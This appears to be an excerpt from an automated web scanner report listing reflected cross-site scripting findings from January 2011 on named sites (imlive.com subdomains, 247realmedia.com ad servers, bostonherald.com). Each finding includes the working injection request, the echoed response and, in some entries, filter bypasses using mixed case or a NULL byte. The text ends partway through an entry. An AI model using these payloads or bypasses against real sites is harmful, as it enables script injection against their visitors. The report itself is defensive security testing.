Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:31 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|R10M5i|O10M5l|R10M5p|R10M62|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 580
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:33 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "8c16f"-alert(1)-"ce5dc795775";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.698. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54070'-alert(1)-'486543e8cd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?54070'-alert(1)-'486543e8cd0=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c034ran2nxljb43o0d1er5my; path=/; HttpOnly
Set-Cookie: spvdr=vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 18736
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=nl.imlive.com&ul=/?54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&qs=54070'-alert(1)-'486543e8cd0=1&iy=dallas&id=44&iu=1&vd=aac8efee-19e5-488d-a8b9-e4ac7d66bb67';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.699. http://nl.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?b38ce"><ScRiPt>alert(1)</ScRiPt>70a1d0b675c=1 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bkwd0p3ok5ihyg55ga3chv45; path=/; HttpOnly
Set-Cookie: spvdr=vd=3419e649-d6e5-4718-8e93-cb3b4fbfb4cb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:16 GMT; path=/
Set-Cookie: inl=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:15 GMT
Connection: close
Content-Length: 19137
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||b38ce"><script>alert(1)</script>70a1d0b675c~1');return false;">
...[SNIP]...

4.700. http://nl.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://nl.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abf97'onerror%3d'alert(1)'3747a08c954 was submitted in the gotopage parameter. This input was echoed as abf97'onerror='alert(1)'3747a08c954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/abf97'onerror%3d'alert(1)'3747a08c954 HTTP/1.1
Host: nl.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: inl=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQRTQDQC=PKPLFJMAFPAENFFGPJDEIIPJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:25 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=nl.imlive.com&ul=/webcam-login/abf97'onerror='alert(1)'3747a08c954/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://nl.imlive.com:80/webcam-login/abf97'onerror='alert(1)'3747a08c954/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.701. http://no.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0019f9e"><script>alert(1)</script>4ba4bc172bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19f9e"><script>alert(1)</script>4ba4bc172bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /?%0019f9e"><script>alert(1)</script>4ba4bc172bb=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=okhzdf55dmwfwo454ybn1y55; path=/; HttpOnly
Set-Cookie: spvdr=vd=156b6ee5-1005-4d39-882a-3bd71de99522&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:17 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:16 GMT
Connection: close
Content-Length: 19351
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||%0019f9e"><script>alert(1)</script>4ba4bc172bb~1');return false;">
...[SNIP]...

4.702. http://no.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0a13'-alert(1)-'2db01fc98e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?b0a13'-alert(1)-'2db01fc98e2=1 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dvipok55uqqpk5mzl2oh2bmd; path=/; HttpOnly
Set-Cookie: spvdr=vd=09b187c9-533d-4717-92f4-f93e601cfbd0&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:18 GMT; path=/
Set-Cookie: ino=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:17 GMT
Connection: close
Content-Length: 18872
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=no.imlive.com&ul=/?b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&qs=b0a13'-alert(1)-'2db01fc98e2=1&iy=dallas&id=44&iu=1&vd=09b187c9-533d-4717-92f4-f93e601cfbd0';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.703. http://no.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://no.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload be3dc'onerror%3d'alert(1)'5045d73ef51 was submitted in the gotopage parameter. This input was echoed as be3dc'onerror='alert(1)'5045d73ef51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/be3dc'onerror%3d'alert(1)'5045d73ef51 HTTP/1.1
Host: no.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:24 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ino=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQTQRCSD=FAOLDJMABFDNBFGJJENBGHOA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:24 GMT
Connection: close
Content-Length: 8316
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=no.imlive.com&ul=/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://no.imlive.com:80/webcam-login/be3dc'onerror='alert(1)'5045d73ef51/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56b8"><script>alert(1)</script>a852931ac4b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.comf56b8"><script>alert(1)</script>a852931ac4b/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 805
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.comf56b8"><script>alert(1)</script>a852931ac4b/index.php/L33/1487956133/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ba76"><script>alert(1)</script>a361e94a73 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php3ba76"><script>alert(1)</script>a361e94a73/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 804
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php3ba76"><script>alert(1)</script>a361e94a73/L33/1730429269/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca2b"><script>alert(1)</script>29b9cf2ceff was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33fca2b"><script>alert(1)</script>29b9cf2ceff/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33fca2b"><script>alert(1)</script>29b9cf2ceff/L/1509490205/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a381"><img%20src%3da%20onerror%3dalert(1)>1394e7e2a7b was submitted in the REST URL parameter 8. This input was echoed as 4a381"><img src=a onerror=alert(1)>1394e7e2a7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top4a381"><img%20src%3da%20onerror%3dalert(1)>1394e7e2a7b/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:00:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
<IMG SRC="http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/254616207/Top4a381"><img src=a onerror=alert(1)>1394e7e2a7b/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

Summary

Severity:	High
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 385a6"><script>alert(1)</script>9acac63b02a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?385a6"><script>alert(1)</script>9acac63b02a=1 HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:59:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


<script type="text/javascript">
var _bizo_ad_partner_id = "847";
var _bizo_ad_section_id = "ATF";
var _bizo_ad_width = "728";
var _bizo_ad_height = "90";
var _b
...[SNIP]...
7realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1159960079/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&385a6"><script>alert(1)</script>9acac63b02a=1" WIDTH=2 HEIGHT=2>

4.709. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]] [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://oascentral.bostonherald.com
Path:	/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466bc"><script>alert(1)</script>0c124ef56d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com466bc"><script>alert(1)</script>0c124ef56d7/video/1[randomNo]@x90]] HTTP/1.1
Host: oascentral.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:09:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 369
Keep-Alive: timeout=60
